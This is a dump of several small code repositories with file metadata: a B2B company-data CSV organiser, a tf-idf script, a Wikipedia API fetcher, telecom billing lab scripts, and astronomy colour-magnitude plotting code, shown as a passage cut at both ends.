msg = \"\\n\" + s + '\\n' + \" \" * start + t + '\\n' + s\n return print(f'{color}{msg}{_c.RESET}')\n\ndef sep(width=60,color=_c.LIGHTCYAN_EX):\n return print(f'{\"-\" * width}')\n" }, { "alpha_fraction": 0.4749999940395355, "alphanum_fraction": 0.48500001430511475, "avg_line_length": 21.22222137451172, "blob_id": "c62b29b759d7db0584fa7ba77b8f36f4c53427be", "content_id": "afd53d8523b1a7bbdda7e63208a9fe90c5936d9a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 200, "license_type": "permissive", "max_line_length": 58, "num_lines": 9, "path": "/lib/regex.py", "repo_name": "Mal-Capone/data", "src_encoding": "UTF-8", "text": "import re\n\ndef find_emails(text):\n regex = r'^(\\w|\\.|\\_|\\-)+[@](\\w|\\_|\\-|\\.)+[.]\\w{2,3}$'\n emailaddr = re.match(regex, text)\n if emailaddr:\n return True\n else:\n return False\n" }, { "alpha_fraction": 0.7567567825317383, "alphanum_fraction": 0.7837837934494019, "avg_line_length": 17.5, "blob_id": "7f0af26f85b383cfee4bec76578df262261d899b", "content_id": "7019f7e20105f1412e0ecf4de9a17001b631f0c7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 37, "license_type": "permissive", "max_line_length": 19, "num_lines": 2, "path": "/README.md", "repo_name": "Mal-Capone/data", "src_encoding": "UTF-8", "text": "# data_organiser\n B2B Data Organiser\n" }, { "alpha_fraction": 0.636734664440155, "alphanum_fraction": 0.6428571343421936, "avg_line_length": 23.549999237060547, "blob_id": "1a4842841c3234632acfda6d287f8192f114fa8f", "content_id": "e728bccc92ee7169c034a6688f01fcce0c6f6265", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 490, "license_type": "permissive", "max_line_length": 67, "num_lines": 20, "path": "/lib/utils.py", "repo_name": "Mal-Capone/data", "src_encoding": "UTF-8", "text": "import os\nimport sys\nimport time\nimport tempfile\nfrom pathlib import Path\nfrom pyprind import ProgBar\n\ndef progressbar(iters=1, heading=\"Working...\"):\n bar = ProgBar(iterations=iters,title=heading)\n bar.stream = sys.stderr\n return bar\n\ndef timeit(method):\n def timed(*args, **kcommitw):\n ts = time.time()\n pq = method(*args, **kcommitw)\n te = time.time()\n print('[i] Excecution Timer : {:2.2f} sec'.format(te - ts))\n return pq\n return timed" }, { "alpha_fraction": 0.5207782983779907, "alphanum_fraction": 0.5255038142204285, "avg_line_length": 36.83684158325195, "blob_id": "b07e85263f57bc8dcb47f0d2ad5c0b4e72b29d9b", "content_id": "3cbe7dd58dd72d77f4c5c459221c2f0329399cec", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7195, "license_type": "permissive", "max_line_length": 199, "num_lines": 190, "path": "/main.py", "repo_name": "Mal-Capone/data", "src_encoding": "UTF-8", "text": "import os\nimport csv\nimport re\nimport codecs\nfrom xutils import printer as p\nfrom pathlib import Path, PurePath\nfrom tqdm.contrib.concurrent import thread_map\nfrom dask import dataframe as dd\n\nglobal hdrs\nhdrs = []\n\nclass Company:\n #\n # def __init__(self, raw_data=None, company_name=None, company_postocde=None, company_no=None,\n # website=None, primary_email=None, postcode=None, name=None, phone_number=None,\n # source_headers=None):\n\n def __init__(self, raw_data=None, company_name=None, company_no=None, website=None, postcode=None,\n phone_number=None, source_headers=None):\n\n\n self.raw = raw_data\n self.source_headers = source_headers if source_headers else []\n\n self.indx = {}\n self.dict = {}\n self.company_name = company_name if company_name else ''\n self.company_no = company_no if company_no else ''\n self.phone = phone_number if phone_number else ''\n self.postcode = postcode if postcode else ''\n self.website = website if website else ''\n self.website_score = 0\n self.emails = ''\n self.twitter = ''\n self.facebook = ''\n\n # Companies House Info\n self.ch_url = None\n self.status = None\n self.reg_number = company_no if company_no else ''\n self.reg_addr = None\n self.build()\n\n def build(self):\n email_pattern = r\"\\\"?([-a-zA-Z0-9.`?{}]+@\\w+\\.\\w+)\\\"?\"\n if self.source_headers:\n for header in self.source_headers:\n self.indx[ self.source_headers.index(header)] = header\n for index, value in self.indx.items():\n value = value.lower()\n self.dict[value] = self.raw[index]\n if 'email' in value or re.search(email_pattern, value):\n email = self.raw[index]\n self.emails += email + \";\"\n self.website = f\"http://www.{str(email).lower().split('@')[1].strip()}/\"\n self.website_score = 10\n elif 'postcode' in value:\n self.postcode = self.raw[index]\n elif 'phone' in value or 'telephone' in value:\n self.phone = str(self.raw[index]).replace(\" \",\"\").replace(\"+44\",\"0\")\n self.phone = re.sub(\"^[0]\",\"+44\",self.phone,1)\n elif 'company_name' in value:\n self.company_name += self.raw[index] + \" \"\n elif 'company' in value:\n self.company_name = self.raw[index]\n elif 'website' in value:\n self.website = self.raw[index]\n self.website_score = 60\n\n def to_row(self):\n r = [self.company_name, self.emails, self.company_name, self.reg_number, self.postcode, str(self.phone).replace(\"+44\", \"0\"), self.website, self.website_score, self.twitter, self.facebook, '']\n return r\n\nclass Employee:\n\n def __init__(self):\n self.id = 0\n self.title = None\n self.forename = None\n self.surname = None\n self.email = None\n self.job_title = None\n self.company = None\n\ndef setup():\n os.makedirs('data/', exist_ok=True)\n company_file = 'data/companies.csv'\n company_headers = ['company_name','number','postcode','phone','email','website','website_score','twitter','facebook','reg_addr']\n\n with open(company_file,'w',newline='',encoding='utf-8') as file:\n csv.writer(file).writerow(company_headers)\n\n employee_file = 'data/employees.csv'\n employee_headers = [\"id\", \"compnay_id\", \"title\", \"forename\", \"surname\", \"email\", \"job_title\"]\n with open(employee_file,'w',newline='',encoding='utf-8') as file:\n csv.writer(file).writerow(employee_headers)\n\ndef get_files(base):\n flist, dirs = [], []\n ext = ['.csv','.xlsx','.xls']\n for path, subdir, files in os.walk(base):\n for file in files:\n if Path(file).suffix in ext and file not in flist:\n flist.append(str(PurePath(path,file)))\n return flist\n\ndef sve(row):\n try:\n comp = Company(raw_data=row, source_headers=hdrs)\n with open('data/companies4.csv', 'a', newline='') as f:\n csv.writer(f).writerow(comp.to_row())\n return comp\n except Exception as ex:\n return None\n\ndef extract(files):\n global hdrs\n companies, cmps, ite = [],[],[]\n for file in files:\n try:\n if Path(file).suffix == \".csv\":\n p.info(f\"Opening {Path(file).name}\")\n with codecs.open(file, 'r', encoding=\"UTF-8\") as csfile:\n reader = csv.reader(csfile)\n rows=[row for row in reader if row]\n hdrs = rows[0]\n n = thread_map(sve, rows, max_workers=50, desc='Doing')\n print(\"n cmpleyte\")\n #\n # for row in reader:\n # if row:\n # try:\n # if reader.line_num == 1:\n # hdrs = row\n # else:\n # comp = Company(raw_data=row, source_data=file, source_headers=hdrs)\n # p.ok(f\"Company Added {comp.emails}\")\n # companies.append(comp)\n # with open('data/companies3.csv','a',newline='') as f:\n # csv.writer(f).writerow(comp.to_row())\n # except Exception as ex:\n # p.exc(f\"Error handling {file} :{ex}\")\n # continue\n except Exception as ex:\n p.exc(f\"Error handling {file} :{ex}\")\n continue\n p.info(f\"Finished File: {Path(file).name} ({len(companies)})\")\n return companies\n\ndef get_rows(filepath):\n try:\n with open(filepath,'r',encoding='latni1',errors='ignore') as xf:\n reader = csv.reader(xf)\n rows = [row for row in reader if row]\n return rows\n except Exception as ex:\n return None\n\n\ndef read(r):\n try:\n file, head, row = r\n cmp = Company(raw_data=row,source_headers=head)\n return cmp\n except Exception as ex:\n p.exc(ex)\n return None\n\nif __name__ == '__main__':\n pass\n # headers = None\n # if not os.path.exists('data/companies.csv'):\n # setup()\n # file_list = get_files(\"d:\\B2B\\\\\")\n #\n # for _file in file_list:\n # get_rows(_file)\n # if Path(_file).suffix == '.csv':\n # with open(_file,'r',errors='ignnore',encoding=\"UTF-8\") as csvfile:\n\n\n #\n # p.info(f\"Total {len(company_list)} Found\")\n # row_data=['id','company_name','number','postcode','phone','email','website','website_score']\n # # n = thread_map(write, company_list, max_workers=40, desc=\"Writing data\")\n # # company_date = [i for i in n if i]\n # with open(\"data/companies2.csv\",'w',newline='') as csvfile:\n # for company in company_list:\n # csv.writer(csvfile).writerow(company.to_row())\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.590563178062439, "alphanum_fraction": 0.6035007834434509, "avg_line_length": 27.565217971801758, "blob_id": "1b2dc7f6a11c30643ab1340ce12f8d18a129a1b2", "content_id": "d6e7e2845a8650da90c9d362c747025eb9f4008f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1314, "license_type": "permissive", "max_line_length": 130, "num_lines": 46, "path": "/config.py", "repo_name": "Mal-Capone/data", "src_encoding": "UTF-8", "text": "import os\nimport re\nimport requests\nfrom bs4 import BeautifulSoup as bs\n\n\nBASE_URL = 'http://download.companieshouse.gov.uk/'\nCH_BASE = 'http://download.companieshouse.gov.uk/'\nCH_HOME = 'http://download.companieshouse.gov.uk/en_output.html'\nCH_DATE = '2020-11-01'\nDB_DATE = '2019-10-01'\nDATA_PATH = 'downloads/ch'\nFILE_ROOT = 'BasicCompanyDataAsOneFile'\nFILE_NAME = 'BasicCompanyDataAsOneFile-{}.zip'\nCONN_FILE = './conn.info'\n\n\n\n# data organising\ndata_dir = 'e:/data/testing/'\ntemp_dir = './data/'\n\ndef get_connStr():\n if os.path.exists(CONN_FILE):\n with open(CONN_FILE, 'r') as file:\n c = \"\".join([line.strip() for line in file.readlines()])\n return c\n\nconn_str = fr'{get_connStr()}'\n\ndef get_companies_house_link():\n return (bs(requests.get(CH_HOME).content, 'lxml').find(\"a\",attrs={'href': re.compile(f\"{FILE_ROOT}*\")})).attrs.get(\"href\")\n\ndef web_tag():\n soup = bs(requests.get(CH_HOME).content, 'lxml')\n root = FILE_ROOT\n return soup.find(\"a\", attrs={'href': re.compile(f\"{root}*\")})\n\ntest_mode = True\n\n#==========================================================\n# SQL Alchemy Config\n#==========================================================\n\nfrom sqlalchemy import create_engine, event, exc\nfrom sqlalchemy.orm import sessionmaker, scoped_session\n" } ]
8
foprel/tfidf-vectorizer
https://github.com/foprel/tfidf-vectorizer
a6c4518cc3c15c4722b27f7ac8e416dde8324c78
284adfa191064a0e8561de02075405bc82d3872a
bbef3bef6f8eedb3c7e10eb7534e00b40b1bd10e
refs/heads/master
2022-06-16T02:49:10.476196
2019-10-09T16:32:42
2019-10-09T16:32:42
213,967,161
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6168067455291748, "alphanum_fraction": 0.6210083961486816, "avg_line_length": 17.896825790405273, "blob_id": "7f0641d252b1cf7292f0b35e134b177ee38fc279", "content_id": "8a09b3717b533ad475f6f6b452af6016c03f87c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2380, "license_type": "no_license", "max_line_length": 72, "num_lines": 126, "path": "/word_count.py", "repo_name": "foprel/tfidf-vectorizer", "src_encoding": "UTF-8", "text": "import re\nfrom math import log\nimport os\nimport nltk\nnltk.download('punkt')\nfrom nltk import word_tokenize,sent_tokenize\n\ncorpus = \"\"\"\nThis is a sentence. This is another sentence. There are three sentences.\n\"\"\"\n\ndef preprocessing(doc):\n\n\tdoc = re.sub(\"\\n\", \" \", doc)\n\tdoc = re.sub(\"[^A-Za-z0-9]+\", \" \", doc)\n\tdoc = re.sub(\" +\", \" \", doc)\n\tdoc = doc.strip()\n\tdoc = doc.lower()\n\n\treturn(doc)\n\nsentences = sent_tokenize(corpus)\n\ndictionary = {}\n\nfor sentence in sentences:\n\tdictionary[sentence] = {}\n\nfor sentence in dictionary:\n\tsentence = preprocessing(sentence)\n\tterms = word_tokenize(sentence)\n\n\t# lemmatize/stem terms\n\t\n\tfor word_token in word_tokens:\n\t\tdictionary[sentence][word_token] = {}\n\nprint(dictionary)\n\n\n# Split original text to sentences and add to dict\n# Clean sentences, remove stopwords and split to list\n# Lemmatize/stem terms\n# Add words to dict\n# Calculate tfidf per word\n# Calculate tfidf-score per sentence\n# Calculate treshold score (e.g. average score per sentence)\n# Return all sentences above treshold\n\n\n# docs = []\n\n# for __, __, files in os.walk(os.getcwd(), topdown=False):\n# \tfor file in files:\n# \t\tif \".txt\" in file:\n# \t\t\tf = open(file, \"r\")\n# \t\t\tcontent = f.read()\n# \t\t\tdocs.append(content)\n\n\n\n# def tokenize(doc):\n\n# \tsentence = re.split('(?<!\\w\\.\\w.)(?<![A-Z][a-z]\\.)(?<=\\.|\\?)\\s', doc)\n\n# \treturn(tokenized_sentences)\n\n\n\n# def preprocessing(doc):\n\n# \tdoc = re.sub(\"\\n\", \" \", doc)\n# \tdoc = re.sub(\"[^A-Za-z0-9]+\", \" \", doc)\n# \tdoc = re.sub(\" +\", \" \", doc)\n# \tdoc = doc.strip()\n# \tdoc = doc.lower()\n\n# \treturn(doc)\n\n# tfidf = {}\n\n\n# def tf(terms):\n\n# \tfor term in terms:\n# \t\tif term not in tfidf:\n# \t\t\ttfidf[term] = {}\n# \t\t\ttfidf[term][\"termFrequency\"] = 1\n# \t\telif term in tfidf:\n# \t\t\ttfidf[term][\"termFrequency\"] += 1\n\n# \treturn\n\n# def df(terms, docs):\n\n# \tdoc_list = []\n\n# \tfor doc in docs:\n# \t\tdoc = preprocessing(doc)\n# \t\tdoc_list.append(doc)\n\n# \tfor term in terms:\n# \t\ttfidf[term][\"docFrequency\"] = 1\n# \t\tfor doc in docs:\n# \t\t\tif term in doc:\n# \t\t\t\ttfidf[term][\"docFrequency\"] += 1\n\n# \treturn\n\n# def calc(tfidf):\n\n# \tterm_list = []\n\n# \tfor term in tfidf:\n# \t\ttf = tfidf[term][\"termFrequency\"]\n# \t\tdoc_len = len(tfidf)\n# \t\tdf = tfidf[term][\"docFrequency\"]\n# \t\tdocs_len = len(docs)\n\n# \t\ttfidf_calc = (tf/doc_len) * log(docs_len/df)\n\n# \t\tterm_list.append([tfidf_calc, term])\n\n# \tresults = sorted(term_list, reverse=True)[:10]\n\n# \tprint(results)" } ]
1
kolyas-lopata/Mdm
https://github.com/kolyas-lopata/Mdm
d4753f1c0dcc8da3347aa039b7e0c4420bce915f
e221da0a861292b3471ba9df4b266a2a63424af7
4ebaabadafa7a295e91033bce4d676bfe8a81cdf
refs/heads/master
2022-09-16T20:49:31.996786
2020-05-31T17:22:48
2020-05-31T17:22:48
263,444,437
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6380255818367004, "alphanum_fraction": 0.6617915630340576, "avg_line_length": 21.79166603088379, "blob_id": "358d431fbd105266831fef3ca6d63b8cec51cb47", "content_id": "2523f0f6979c66c50db47481d8e7ea7c36ed4714", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 564, "license_type": "no_license", "max_line_length": 108, "num_lines": 24, "path": "/lab3/main.py", "repo_name": "kolyas-lopata/Mdm", "src_encoding": "UTF-8", "text": "from docxtpl import DocxTemplate\nimport os\n\n\nf=open('billing.txt', 'r', encoding='utf-8')\na=f.readlines()\nprice=float(a[-1].split()[0])\n\n\nf=open('output.txt', 'r', encoding='utf-8')\na=f.readlines()\nprice+=float(a[-1].split()[0])\n\nnds=round(price*0.13,2)\ntemplates=[]\n\ndoc = DocxTemplate(\"template.docx\")\ncontext = {'service':\"Звонки, Смс, Интернет\", 'number':\"1\",'ed':' ','price_ed':'1','price':price, 'nds':nds}\ndoc.render(context)\ndoc.save(\"final_doc.docx\")\n\n\nos.system('abiword --to=pdf final_doc.docx 2>/dev/null')\nos.system('final_doc.docx')\n" }, { "alpha_fraction": 0.4938775599002838, "alphanum_fraction": 0.5537415146827698, "avg_line_length": 27.440000534057617, "blob_id": "c95a85d7a2d8d6a8e91702c571e418de455b25c5", "content_id": "499a12c46b2a03f383733ff04779ab07f4bff7b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1656, "license_type": "no_license", "max_line_length": 77, "num_lines": 50, "path": "/lab1/main.py", "repo_name": "kolyas-lopata/Mdm", "src_encoding": "UTF-8", "text": "# Протарифицировать абонента с номером 933156729 с коэффициентом k:\r\n# 4руб/минута исходящие звонки и входящие звонки до 0:30,\r\n# 2руб/минута исходящие звонки и входящие звонки после 0:30,\r\n# смс - 1,5руб/шт\r\n\r\n\r\n\r\nimport csv\r\n\r\ndef parsing(number):\r\n with open('data.csv', newline='') as csvfile:\r\n calls_before_00_30=[]\r\n calls_after_00_30=[]\r\n datareader = csv.reader(csvfile, delimiter=',')\r\n for row in datareader:\r\n print(row)\r\n if (row[1]==number or row[2]==number) and int(row[0][-5:-3])<30:\r\n calls_before_00_30.append(row)\r\n if (row[1]==number or row[2]==number) and int(row[0][-5:-3])>=30:\r\n calls_after_00_30.append(row)\r\n print(calls_before_00_30,calls_after_00_30)\r\n return calls_before_00_30,calls_after_00_30\r\n\r\n\r\ndef tariffication(before,after):\r\n calls = [0, 0]\r\n mes = 0.0\r\n for i in before:\r\n calls[0] += float(i[3])\r\n mes += float(i[4])\r\n for i in after:\r\n calls[1] += float(i[3])\r\n mes += float(i[4])\r\n x=calls[0]*4+calls[1]*2\r\n y=mes*1.5\r\n return (x,y)\r\n\r\ndef main():\r\n print('Введите номер абонента')\r\n number=str(input())\r\n s=parsing(number)\r\n s=tariffication(s[0],s[1])\r\n\r\n f=open('billing.txt', 'w', encoding='utf-8')\r\n f.write(str(s[0])+' - Счет за звонки\\n')\r\n f.write(str(s[1])+' - Счет за СМС\\n')\r\n f.write(str(s[0]+s[1])+' - Всего')\r\n f.close()\r\n\r\nmain()" }, { "alpha_fraction": 0.46620047092437744, "alphanum_fraction": 0.5151515007019043, "avg_line_length": 21.298702239990234, "blob_id": "f61476b6cabe7541efc4042eabee7e8ca0338938", "content_id": "5bd4c2f40dfe498a69eede8d22c33b2142109587", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1778, "license_type": "no_license", "max_line_length": 118, "num_lines": 77, "path": "/lab2/main.py", "repo_name": "kolyas-lopata/Mdm", "src_encoding": "UTF-8", "text": "# Вариант 7\n# Протарифицировать абонента с IP-адресом 87.245.198.147\n# с коэффициентом k: 2руб/Мб\nimport os\nimport math\nimport matplotlib.pyplot as plt\nimport datetime\n\nos.system(\"nfdump -r nfcapd.202002251200 >> input.txt\")\n\ndef refacor():\n\n f=open('input.txt','r', encoding='utf-8')\n f.readline()\n data=[]\n while True:\n q=f.readline()\n a=q.split(' ')\n s=[]\n for i in a:\n if i=='':\n pass\n else:\n s.append(i)\n data.append(s)\n if q=='':\n break\n data=data[:-5]\n f.close()\n return data\n\n\n\ndef tarification(ip):\n data=refacor()\n coord=[]\n trafik=0\n\n for i in data:\n if i[5][:len(ip)]==ip or i[7][:len(ip)]==ip:\n if i[-2]=='M':\n trafik+=float(i[-3])\n coord.append([float(i[-3])*1024*1024,str(datetime.time(int(i[1][:2]),int(i[1][3:5]),int(i[1][6:8])))])\n else:\n trafik+=(float(i[-2])/1024)/1024\n coord.append([((float(i[-2]))), str(datetime.time(int(i[1][:2]),int(i[1][3:5]),int(i[1][6:8])))])\n\n\n trafik = math.ceil(trafik)\n print(coord)\n return [trafik,coord]\n\n\n\ndef grafik(coord):\n coord=sorted(coord, key=lambda student: student[1])\n x=[]\n y=[]\n for i in coord:\n x.append(i[0])\n y.append(i[1])\n ax = plt.axes()\n ax.set_ylabel(\"Bytes\", fontsize=14)\n ax.set_xlabel(\"Time\", fontsize=14)\n ax.plot(y, x)\n plt.savefig('graph.png')\n plt.show()\n\ndef main():\n f=open('output.txt', 'w',encoding='utf-8')\n a=tarification('87.245.198.147')\n f.writelines(str(a[0])+'Mb\\n')\n f.writelines(str(a[0]*2)+' руб')\n grafik(a[1])\n f.close()\n\nmain()" } ]
3
tmk56575/tmk56575
https://github.com/tmk56575/tmk56575
3bf624871a2f84f962efe663a7ab044a6c2bd231
4b0b3433b05cfd79b33122baf4ecb2058467f0da
852ad571306125e80ba4e90f642c80446ef1cf30
refs/heads/master
2021-01-10T02:38:43.754769
2015-11-25T08:02:12
2015-11-25T08:02:12
46,844,096
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6888889074325562, "alphanum_fraction": 0.6940171122550964, "avg_line_length": 25.590909957885742, "blob_id": "bd1f3a41655d2ae3775b4b00825a067135c6ba4b", "content_id": "2c7c0382154f80d7d38f03c73a1fb1049ddc0bd3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 585, "license_type": "no_license", "max_line_length": 84, "num_lines": 22, "path": "/wikiapi.py", "repo_name": "tmk56575/tmk56575", "src_encoding": "UTF-8", "text": "import sys\nimport urllib.request\nimport urllib.parse\n\nif(len(sys.argv) >= 2 ):\n\ttitle = sys.argv[1]\nelse:\n\ttitle = input(\"title>\")\n\n# dbg, json, none, php, txt, xml, yaml\ndata_format = \"?format=txt\"\ndata_action = \"&action=query\"\ndata_prop = \"&prop=revisions\"\ndata_titles = \"&titles=\"+urllib.parse.quote(title)\ndata_rvprop = \"&rvprop=content\"\n\nbaseurl = \"http://ja.wikipedia.org/w/api.php\"\napiurl = baseurl + data_format + data_action + data_prop + data_titles + data_rvprop\nprint(apiurl)\n\nreply = urllib.request.urlopen(apiurl).read().decode(\"utf-8\")\nopen(\"test.txt\",\"w\").write(reply)\n" } ]
1
AJChalmers/CMD_FileMaker
https://github.com/AJChalmers/CMD_FileMaker
016f7280272126df7dfc73a37ad52de9e5483666
4cf33bfcb2a61eb2dd2eb7253251c4fda6e62054
129164b73176936af508c425ed3f7afef5dd968b
refs/heads/main
2023-02-06T18:13:40.695456
2020-12-28T18:12:52
2020-12-28T18:12:52
325,079,901
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6542137265205383, "alphanum_fraction": 0.6607298254966736, "avg_line_length": 30.871429443359375, "blob_id": "9df2a3bd8acd6fed3e187be71194680f931a1668", "content_id": "411cdf065902e4af533048703764b84bd0593692", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2302, "license_type": "no_license", "max_line_length": 151, "num_lines": 70, "path": "/CMD_plotterV2.py", "repo_name": "AJChalmers/CMD_FileMaker", "src_encoding": "UTF-8", "text": "## To Run with python: cd to directory, python FileName.py. Takes history_mainset_modelnumber, outputs plotname_mainset_modelnumber\r\n\r\n# V2: Changed inverter from int to boolean, changed the input file name, set marker color to red, fixed indentation issues\r\n# V3: Me, changing program from HR_plotter to a period/GREKM/light curve plotter for non linear data \r\n###NEW PROGRAM\r\n\r\n# V1: Made of off FullAmpChecker to make light curve plots automatically\r\n###NEW PROGRAM\r\n\r\n# V1: Templet for CMD_FileMakerV3.cpp. C program will use and edit this templet to make program that it will run. Also made change for Y-axis invertion\r\n\r\n# V2: Adding Type and data location controls to make use easier (also to make gettting I,V-I easy)\r\n\r\n# import libraries\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n### Controls ###\r\n\r\nMode = 'NinthO'\r\n\r\nCMDdata_FileName = '_CMDdataClassical_Set' #Prefix to input CMD data file. Suffix is Set.dat (example: FU_CMDdata_Set as prefix and A.dat as suffix)\r\n\r\nStarType = 'Classical' #Type of star being analyized. Will use this for title to plot and output file for plot.\r\nxTitle = 'M_V - M_I (Mags)' #Label for xaxis. 'M_V - M_I (Mags)' usually\r\nyTitle = 'M_I (Mags)' #Label for yaxis. 'M_V (Mags)' or 'M_I (Mags)'\r\n\r\nDataLocationFor_x = 3 #Location in file for x value. Note, starts at 0. \r\nDataLocationFor_y = 2 #Location in file for y value. Note, starts at 0. 2 for I, 1 for V\r\n\r\n# create array to iterate through convection sets\r\n\r\nsets = ['C', 'D'] #'A', 'B', 'C', 'D'\r\n\r\n# variable to keep y axis inverted\r\n\r\ninverter = True #Made False for NonLinear analysis\r\n\r\n\r\nfor i in sets:\r\n\t\r\n # grab data from file\r\n\r\n data = np.loadtxt(Mode + CMDdata_FileName + i + '.dat', skiprows=1) \r\n\t\r\n\t### CMD Stuff ###\r\n\t\r\n\t# This seems to go X then Y column, starts at 0\r\n plt.plot(data[:, DataLocationFor_x], data[:, DataLocationFor_y], 'r.', markersize=1) #Plotting\r\n plt.xlabel(xTitle)\r\n plt.ylabel(yTitle)\r\n plt.suptitle(Mode + ' mode Set ' + i + ' CMD ' + StarType)\r\n\r\n # invert x axis once\r\n\r\n if inverter:\r\n\r\n # invert y axis\r\n\r\n plt.gca().invert_yaxis()\r\n #inverter = False\r\n\r\n # show the plot\r\n # plt.show()\r\n\r\n # save file\r\n\r\n plt.savefig(Mode + '_Set' + i + '_' + StarType + 'CMD.png')\r\n plt.clf()\r\n\t" }, { "alpha_fraction": 0.6382978558540344, "alphanum_fraction": 0.6440483331680298, "avg_line_length": 26.491804122924805, "blob_id": "fadb517d2c7cb196d7b58569d71c02e1af0a7849", "content_id": "6e9dd6520abe014f29fb1b6bf749d07cef5f7446", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1739, "license_type": "no_license", "max_line_length": 151, "num_lines": 61, "path": "/CMD_plotter.py", "repo_name": "AJChalmers/CMD_FileMaker", "src_encoding": "UTF-8", "text": "## To Run with python: cd to directory, python FileName.py. Takes history_mainset_modelnumber, outputs plotname_mainset_modelnumber\r\n\r\n# V2: Changed inverter from int to boolean, changed the input file name, set marker color to red, fixed indentation issues\r\n# V3: Me, changing program from HR_plotter to a period/GREKM/light curve plotter for non linear data \r\n###NEW PROGRAM\r\n\r\n# V1: Made of off FullAmpChecker to make light curve plots automatically\r\n###NEW PROGRAM\r\n\r\n# V1: Templet for CMD_FileMakerV3.cpp. C program will use and edit this templet to make program that it will run. Also made change for Y-axis invertion\r\n\r\n# import libraries\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n### Controls ###\r\n\r\nMode = 'NinthO'\r\n\r\nCMDdata_FileName = '_CMDdataRRL_Set' #Prefix to input CMD data file. Suffix is Set.dat (example: FU_CMDdata_Set as prefix and A.dat as suffix)\r\n\r\n# create array to iterate through convection sets\r\n\r\nsets = ['B', 'C', 'D'] #'A', 'B', 'C', 'D'\r\n\r\n# variable to keep y axis inverted\r\n\r\ninverter = True #Made False for NonLinear analysis\r\n\r\n\r\nfor i in sets:\r\n\t\r\n # grab data from file\r\n\r\n data = np.loadtxt(Mode + CMDdata_FileName + i + '.dat', skiprows=1) \r\n\t\r\n\t### CMD Stuff ###\r\n\t\r\n\t# This seems to go X then Y column, starts at 0\r\n plt.plot(data[:, 3], data[:, 1], 'r.', markersize=1) #Plotting\r\n plt.xlabel('M_V - M_I (Mags)')\r\n plt.ylabel('M_V (Mags)')\r\n plt.suptitle(Mode + ' mode Set ' + i + ' CMD RRL')\r\n\r\n # invert x axis once\r\n\r\n if inverter:\r\n\r\n # invert y axis\r\n\r\n plt.gca().invert_yaxis()\r\n #inverter = False\r\n\r\n # show the plot\r\n # plt.show()\r\n\r\n # save file\r\n\r\n plt.savefig(Mode + '_Set' + i + '_RRLCMD.png')\r\n plt.clf()\r\n\t" }, { "alpha_fraction": 0.6313516497612, "alphanum_fraction": 0.6761922240257263, "avg_line_length": 33.92409133911133, "blob_id": "d40f11fa042b3dda2d1186c2ce779a29109a67d6", "content_id": "323434d3f3bb6cd48e8e5adc095d47aa7ce7cc6b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 10883, "license_type": "no_license", "max_line_length": 887, "num_lines": 303, "path": "/CMD_FileMaker.cpp", "repo_name": "AJChalmers/CMD_FileMaker", "src_encoding": "UTF-8", "text": "/////Program designed to use output from InstabilityStrip_V12.cpp along with histroy files to get CMD data. \r\n\r\n//V1: Have program read InstabilityStrip_V12.cpp output for positive growth, then use model numbers in there to get history file. Then fill arrays with history file columns. Output Mv, Mv-Mi for use in python program. \r\n\t//Working program when NumOfSets is set to 1. Only does one set at a time.\r\n\r\n\r\n# include <iostream>\r\n# include <fstream>\r\n# include <math.h>\r\n# include <iomanip>\r\n# include <cmath>\r\n# include <stdlib.h>\r\n# include <cstdlib>\r\n//# include <fstream.h>\r\n# include <string.h>\r\n# include <string>\r\n//# include <dos.h> //For Sleep() \r\n\r\n\r\nusing namespace std;\r\nint main() {\r\n\t\r\n\t//Controls//\r\n\r\n\tint NumOfSets = 1; //Number of sets, usually 4 for A, B, C, D. Max is 4 sets currently\r\n\tint NumOfModels = 20412; //Total possible number of models. Will be used for largest array possible\r\n\t\r\n\tchar log_directory_prefix[50] = \"LINA_reruns/SetA/LOGS/logs_\"; //Prefix to log_directory, suffix is model number. This is where history file should be\r\n\tchar HistoryFileName[50] = \"history.data\"; //Normally should be \"history.data\"\r\n\t\r\n\tchar inputFileName_ForPositiveGrowthModels[50] = \"PostiveGrowth\"; //input File with model parameters that have positve growth rates. Will have prefix for mode that is defined below. Must be in working directory. Suffix is \"_Set.dat\"\r\n\t\r\n\tchar outputFileName[50] = \"CMDdata\"; //output file with CMD data in it. Will have prefix for mode defined below as well as the set suffix.\r\n\t\r\n\tchar FU_FilePrefix[10] = \"FU_\"; //Prefix to input/output files that contain data for FU mode\r\n\tchar FO_FilePrefix[10] = \"FO_\"; //Prefix to input/output files that contain data for FO mode\r\n\tchar SO_FilePrefix[10] = \"2O_\"; //Prefix to input/output files that contain data for 2O mode\r\n\tchar ThirdO_FilePrefix[10] = \"ThirdO_\"; //Prefix to input/output files that contain data for ThirdO mode\r\n\tchar ForthO_FilePrefix[10] = \"ForthO_\"; //Prefix to input/output files that contain data for ForthO mode\r\n\tchar FifthO_FilePrefix[10] = \"FifthO_\"; //Prefix to input/output files that contain data for FifthO mode\r\n\tchar SixthO_FilePrefix[10] = \"SixthO_\"; //Prefix to input/output files that contain data for SixthO mode\r\n\tchar SeventhO_FilePrefix[10] = \"SeventhO_\"; //Prefix to input/output files that contain data for SeventhO mode\r\n\tchar EighthO_FilePrefix[10] = 